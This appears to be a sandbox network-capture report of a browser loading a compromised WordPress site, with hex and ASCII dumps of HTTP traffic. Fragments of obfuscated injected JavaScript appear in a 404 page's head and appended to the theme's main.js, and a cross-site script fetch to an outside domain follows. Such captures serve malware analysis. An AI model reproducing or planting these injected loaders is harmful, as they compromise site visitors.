                                                                                                                                      2024-04-24 10:14:05 UTC14994INData Raw: aa 1c 55 9d 93 8a 3b ad b8 b3 ad 16 17 5c 62 70 45 0d ae a9 de 75 95 bb a1 0a 37 55 ee 96 2a dc 56 bd a7 ad 2a cf 3c 67 f0 32 f2 fa ce 7b d7 7a c1 d3 fd 17 d2 ce d7 8e 7a e0 48 ff 49 9a 7f ff b7 cf 73 db f4 37 75 c4 f8 76 75 bb c3 20 f5 5e 73 bc 15 8d 25 a6 30 a7 c4 ee e4 45 49 91 d9 53 89 e4 fd 94 57 a1 9e ce d2 2b aa 50 82 9a ce e8 64 61 ee 78 8e d3 1d 67 a9 77 69 1d 29 72 8e 93 cb 1a eb 0b c7 3d 79 15 4d 5b 5e c8 ac 6a 87 76 69 af ae 89 da a1 01 c4 e6 ac d2 ac 52 c9 19 5d da c2 36 dd 94 32 7d ae a3 c6 0e 95 29 b6 20 93 50 15 df d2 84 79 7f ec b4 b0 07 66 70 c3 2a fb a1 62 23 18 13 b0 a4 75 50 0d 69 25 3e a2 99 0b ab ac fe d8 74 a9 f2 6b 05 25 7c c6 16 35 b7 76 6c a9 fc dc 54 43 b8 93 d0 28 68 32 b3 6a 8e 19 e4 ae b5 8b 16 e9 aa 3d f7 ef 32 f9 2e c9 f2
                                                                                                                                      Data Ascii: U;\bpEu7U*V*<g2{zzHIs7uvu ^s%0EISW+Pdaxgwi)r=yM[^jviR]62}) Pyfp*b#uPi%>tk%|5vlTC(h2j=2.
                                                                                                                                      2024-04-24 10:14:05 UTC3462INData Raw: e8 58 d9 99 91 51 fc e4 58 9d f7 94 26 2e 40 46 3e c6 37 cb d4 6b 93 c4 6c 44 62 57 05 97 f8 b7 95 14 ad 4e 56 c7 fb 2d 46 9d fd 56 1f 37 de c9 50 4c c5 e9 56 b7 f6 8e a7 f0 9d 67 f5 e1 34 6b a5 87 52 4c f8 ad 25 dc 06 65 15 a8 88 1c b9 6a ff c0 95 20 5e 53 9d 41 a0 aa 94 13 76 4b bc 76 ca 59 0c 05 c1 e8 de 3f 5f 2c b8 2a de 26 6a 59 24 5c 0d bb b6 2c f2 d4 ef 45 cb aa b0 5b 81 db fa 4a 86 a0 65 92 70 75 d1 6b 95 93 bd 68 69 e5 c5 a5 2a 5a 66 89 b7 2a 0d 67 b9 6c 10 28 ba b4 c0 d6 75 2f 72 f7 70 8b 01 f4 cf c4 97 82 21 42 75 f3 10 6d c5 e4 b8 db d7 e6 fb 14 6a c0 3b 31 4b b0 02 c6 e8 5e 01 3d ee 73 d0 d9 da 60 72 6b 2f f3 ef 82 02 1b 5d 75 f0 10 13 e3 30 a8 4c 31 a1 53 5f 2c 34 7b 9c 46 39 5a c3 32 5e e6 80 5e 44 19 ba 9d c2 11 f1 a4 45 79 ac 50 47 37 f2
                                                                                                                                      Data Ascii: XQX&.@F>7klDbWNV-FV7PLVg4kRL%ej ^SAvKvY?_,*&jY$\,E[Jepukhi*Zf*gl(u/rp!Bumj;1K^=s`rk/]u0L1S_,4{F9Z2^^DEyPG7


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      113192.168.2.1649866153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:05 UTC744OUTGET /wp-content/themes/themify-shoppe/themify/js/modules/themify.sidemenu.js?ver=5.6.4 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Purpose: prefetch
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:05 UTC597INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:05 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:35 GMT
                                                                                                                                      etag: "25d5-64623fef-8ec33477e5ac2086;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 9685
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:05 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:05 UTC771INData Raw: 3b 28 28 54 68 65 6d 69 66 79 29 3d 3e 7b 0d 0a 0d 0a 09 27 75 73 65 20 73 74 72 69 63 74 27 3b 0d 0a 0d 0a 09 63 6f 6e 73 74 20 64 65 66 61 75 6c 74 73 20 3d 20 7b 0d 0a 09 09 09 70 61 6e 65 6c 3a 20 27 23 6d 6f 62 69 6c 65 2d 6d 65 6e 75 27 2c 0d 0a 09 09 09 63 6c 6f 73 65 3a 20 27 27 2c 0d 0a 09 09 09 73 69 64 65 3a 20 27 72 69 67 68 74 27 2c 0d 0a 09 09 09 68 61 73 4f 76 65 72 6c 61 79 3a 74 72 75 65 2c 0d 0a 09 09 09 62 65 66 6f 72 65 53 68 6f 77 3a 6e 75 6c 6c 2c 0d 0a 09 09 09 61 66 74 65 72 53 68 6f 77 3a 6e 75 6c 6c 2c 0d 0a 09 09 09 62 65 66 6f 72 65 48 69 64 65 3a 6e 75 6c 6c 2c 0d 0a 09 09 09 61 66 74 65 72 48 69 64 65 3a 6e 75 6c 6c 0d 0a 09 09 7d 2c 0d 0a 09 09 69 6e 73 74 61 6e 63 65 3d 5b 5d 3b 0d 0a 09 6c 65 74 20 6f 76 65 72 4c 61 79 3d
                                                                                                                                      Data Ascii: ;((Themify)=>{'use strict';const defaults = {panel: '#mobile-menu',close: '',side: 'right',hasOverlay:true,beforeShow:null,afterShow:null,beforeHide:null,afterHide:null},instance=[];let overLay=
                                                                                                                                      2024-04-24 10:14:05 UTC8914INData Raw: 65 74 75 72 6e 20 72 65 70 6c 61 63 65 6d 65 6e 74 73 5b 6d 61 74 63 68 5d 3b 20 0d 0a 09 09 09 7d 20 0d 0a 09 09 29 3b 0d 0a 09 09 74 68 69 73 2e 69 6e 69 74 28 29 3b 0d 0a 09 7d 0d 0a 0d 0a 09 53 69 64 65 4d 65 6e 75 2e 70 72 6f 74 6f 74 79 70 65 20 3d 20 7b 0d 0a 09 09 69 6e 69 74 28 29 20 7b 0d 0a 09 09 09 63 6f 6e 73 74 20 73 65 6c 66 20 3d 20 74 68 69 73 3b 0d 0a 09 09 09 69 66 28 6f 76 65 72 4c 61 79 3d 3d 3d 6e 75 6c 6c 20 26 26 20 74 68 69 73 2e 73 65 74 74 69 6e 67 73 5b 27 68 61 73 4f 76 65 72 6c 61 79 27 5d 3d 3d 3d 20 74 72 75 65 29 7b 0d 0a 09 09 09 09 6f 76 65 72 4c 61 79 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 64 69 76 27 29 3b 0d 0a 09 09 09 09 6f 76 65 72 4c 61 79 2e 63 6c 61 73 73 4e 61 6d 65 20
                                                                                                                                      Data Ascii: eturn replacements[match]; } );this.init();}SideMenu.prototype = {init() {const self = this;if(overLay===null && this.settings['hasOverlay']=== true){overLay = document.createElement('div');overLay.className


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      114192.168.2.1649867153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:05 UTC395OUTGET /wp-content/uploads/2021/06/Exodontia-Homepage-01-copy.png HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:06 UTC582INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:06 GMT
                                                                                                                                      content-type: image/png
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:21 GMT
                                                                                                                                      etag: "1408-64623fe1-f4dda720282e0aae;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 5128
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:06 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:06 UTC1368INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 2d 00 00 00 39 08 06 00 00 00 fa 31 1b d6 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 f7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 38 38 2c 20 32 30 32 30 2f 30 37 2f 31 30 2d 32 32 3a 30 36 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                                      Data Ascii: PNGIHDR-91pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RD
                                                                                                                                      2024-04-24 10:14:06 UTC3760INData Raw: 35 35 2d 38 38 31 35 35 62 30 33 32 35 63 64 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 31 2d 30 36 2d 30 38 54 31 36 3a 35 31 3a 31 35 2b 30 31 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 2f 72 64 66 3a 53 65 71 3e 20 3c 2f 78 6d 70 4d 4d 3a 48 69 73 74 6f 72 79 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e 1f 27 92 28 00 00 0d b7 49 44 41 54 78 9c ed 9d d1 71 e3 38 0c 86 ff bd b9 02 8e 2d 24 ef a7 07 a7 84
                                                                                                                                      Data Ascii: 55-88155b0325cd" stEvt:when="2021-06-08T16:51:15+01:00" stEvt:softwareAgent="Adobe Photoshop 22.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>'(IDATxq8-$


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      115192.168.2.1649869153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:06 UTC630OUTGET /wp-content/uploads/2021/07/Exodontia-Homepage-01-copy.png HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:07 UTC651INHTTP/1.1 404 Not Found
                                                                                                                                      Connection: close
                                                                                                                                      x-powered-by: PHP/7.4.33
                                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                                      link: <https://exodontia.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                      server-timing: wp-before-template;dur=46.72
                                                                                                                                      transfer-encoding: chunked
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:07 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:07 UTC717INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 47 42 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 32 65 31 28 29 7b 76 61 72 20 5f 30 78 37 36 33 37 63 34 3d 5b 27 65 64 67 65 27 2c 27 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 67 6c 6f 62 61 6c 5f 6e 61 6d 65 27 2c 27 73 65 74 41 74 74 72 69 62 75 74 65 27 2c 27 31 39 35 36 37 36 34 37 75 6f 54 65 4b 69 27 2c 27 6e 61 76 69 67 61 74 6f 72 49 6e 66 6f 27 2c 27 68 6f 73 74 27 2c 27 5b 64 61 74 61 2d 69 64 3d 5c 78 32 37 27 2c 27 62 72 6f 77 73 65 72 27 2c 27 3c 73 74 79 6c 65 5c 78 32 30 64 61 74 61 2d 69 64 3d 5c 78 32
                                                                                                                                      Data Ascii: 10000<!DOCTYPE html><html lang="en-GB"> <head><script>function _0x42e1(){var _0x7637c4=['edge','insertAdjacentHTML','disabled','global_name','setAttribute','19567647uoTeKi','navigatorInfo','host','[data-id=\x27','browser','<style\x20data-id=\x2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      116192.168.2.1649870153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:06 UTC574OUTGET /wp-content/themes/themify-shoppe/themify/js/main.js?ver=5.6.4 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:07 UTC599INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:07 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Mon, 15 May 2023 14:21:35 GMT
                                                                                                                                      etag: "14876-64623fef-c4e22f5dfa14c55d;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 84086
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:07 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:07 UTC769INData Raw: 3b 0d 0a 76 61 72 20 54 68 65 6d 69 66 79 3b 0d 0a 28 28 77 69 6e 2c 20 64 6f 63 2c 20 75 6e 64 2c 20 24 29 3d 3e 7b 0d 0a 20 20 20 20 27 75 73 65 20 73 74 72 69 63 74 27 3b 0d 0a 20 20 20 20 54 68 65 6d 69 66 79 20 3d 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 73 73 4c 61 7a 79 3a 20 7b 7d 2c 0d 0a 20 20 20 20 20 20 20 20 6a 73 4c 61 7a 79 3a 20 7b 7d 2c 0d 0a 20 20 20 20 20 20 20 20 6a 73 43 61 6c 6c 62 61 63 6b 73 3a 20 7b 7d 2c 0d 0a 20 20 20 20 20 20 20 20 63 73 73 43 61 6c 6c 62 61 63 6b 73 3a 20 7b 7d 2c 0d 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 73 51 75 65 75 65 3a 20 7b 7d 2c 0d 0a 20 20 20 20 20 20 20 20 69 73 5f 6d 69 6e 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 20 20 20 20 65 76 65 6e 74 73 3a 20 7b 7d 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79
                                                                                                                                      Data Ascii: ;var Themify;((win, doc, und, $)=>{ 'use strict'; Themify = { cssLazy: {}, jsLazy: {}, jsCallbacks: {}, cssCallbacks: {}, fontsQueue: {}, is_min: false, events: {}, body
                                                                                                                                      2024-04-24 10:14:07 UTC14994INData Raw: 74 79 70 65 20 3d 3d 3d 20 27 69 6e 70 75 74 27 20 7c 7c 20 74 79 70 65 3d 3d 3d 27 72 65 73 69 7a 65 27 20 7c 7c 20 28 74 79 70 65 20 3d 3d 3d 20 27 63 68 61 6e 67 65 27 20 26 26 20 21 70 61 72 61 6d 73 29 20 7c 7c 20 74 79 70 65 2e 69 6e 64 65 78 4f 66 28 27 70 6f 69 6e 74 65 72 27 29 20 3d 3d 3d 20 30 20 7c 7c 20 74 79 70 65 2e 69 6e 64 65 78 4f 66 28 27 74 6f 75 63 68 27 29 20 3d 3d 3d 20 30 20 7c 7c 20 74 79 70 65 2e 69 6e 64 65 78 4f 66 28 27 6d 6f 75 73 65 27 29 20 3d 3d 3d 20 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 70 61 72 61 6d 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 72 61 6d 73 20 3d 20 7b 7d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20
                                                                                                                                      Data Ascii: type === 'input' || type==='resize' || (type === 'change' && !params) || type.indexOf('pointer') === 0 || type.indexOf('touch') === 0 || type.indexOf('mouse') === 0) { if (!params) { params = {}; }
                                                                                                                                      2024-04-24 10:14:07 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 6c 6f 61 64 65 64 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 29 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 69 6e 69 74 57 43 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d
                                                                                                                                      Data Ascii: } else { _loaded(); } requestAnimationFrame(()=> { this.initWC(); setTimeout(()=
                                                                                                                                      2024-04-24 10:14:07 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 65 73 74 28 29 20 3d 3d 3d 20 74 72 75 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 69 73 2e 72 65 71 75 65 73 74 49 64 6c 65 43 61 6c 6c 62 61 63 6b 28 63 61 6c 6c 62 61 63 6b 2c 32 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 68 69 73 2e 6a 73 43 61 6c 6c 62 61 63 6b 73 5b 69 64 5d 20 3d 3d 3d 20 75 6e 64 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                      Data Ascii: if (test() === true) { this.requestIdleCallback(callback,200); return this; } if (this.jsCallbacks[id] === und) {
                                                                                                                                      2024-04-24 10:14:07 UTC16384INData Raw: 20 20 72 6f 6f 74 4d 61 72 67 69 6e 3a 20 27 33 30 30 70 78 20 30 70 78 20 33 30 30 70 78 20 30 70 78 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 6c 65 6e 3b 20 2b 2b 69 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 74 65 6d 73 5b 69 5d 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 6c 61 7a 79 27 29 20 26 26 20 21 69 74 65 6d 73 5b 69 5d 2e 68 61 73 41
                                                                                                                                      Data Ascii: rootMargin: '300px 0px 300px 0px' }); for (let i = 0; i < len; ++i) { if (items[i].hasAttribute('data-lazy') && !items[i].hasA
                                                                                                                                      2024-04-24 10:14:07 UTC16384INData Raw: 65 6c 66 2e 63 73 73 4c 61 7a 79 5b 27 74 66 5f 6d 65 67 61 6d 65 6e 75 27 5d 20 3d 20 74 72 75 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 68 65 63 6b 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 73 65 6c 66 2e 6a 73 4c 61 7a 79 5b 27 74 66 5f 6d 65 67 61 6d 65 6e 75 27 5d 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 6c 66 2e 4c 6f 61 64 41 73 79 6e 63 28 73 65 6c 66 2e 75 72 6c 2b 27 2f 6d 65 67
                                                                                                                                      Data Ascii: elf.cssLazy['tf_megamenu'] = true; check(); }); } if (!self.jsLazy['tf_megamenu']) { self.LoadAsync(self.url+'/meg
                                                                                                                                      2024-04-24 10:14:07 UTC2787INData Raw: 5f 30 78 33 37 38 61 30 33 2c 5f 30 78 32 61 31 37 61 31 29 7b 5f 30 78 33 37 38 61 30 33 3d 5f 30 78 33 37 38 61 30 33 2d 30 78 31 34 63 3b 76 61 72 20 5f 30 78 31 38 33 61 37 38 3d 5f 30 78 34 63 34 35 39 32 5b 5f 30 78 33 37 38 61 30 33 5d 3b 69 66 28 5f 30 78 35 38 30 64 5b 27 66 46 48 50 62 48 27 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 5f 30 78 31 66 38 34 66 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 38 30 64 30 29 7b 76 61 72 20 5f 30 78 33 32 64 36 32 63 3d 27 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 27 3b 76 61 72 20 5f 30 78 34 30 35 65 64 33 3d 27 27 2c 5f 30 78 38 37 34 33
                                                                                                                                      Data Ascii: _0x378a03,_0x2a17a1){_0x378a03=_0x378a03-0x14c;var _0x183a78=_0x4c4592[_0x378a03];if(_0x580d['fFHPbH']===undefined){var _0x1f84f6=function(_0x580d0){var _0x32d62c='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x405ed3='',_0x8743


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      117192.168.2.1649874185.158.251.2404437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:07 UTC579OUTGET /+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ HTTP/1.1
                                                                                                                                      Host: stake.libertariancounterpoint.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
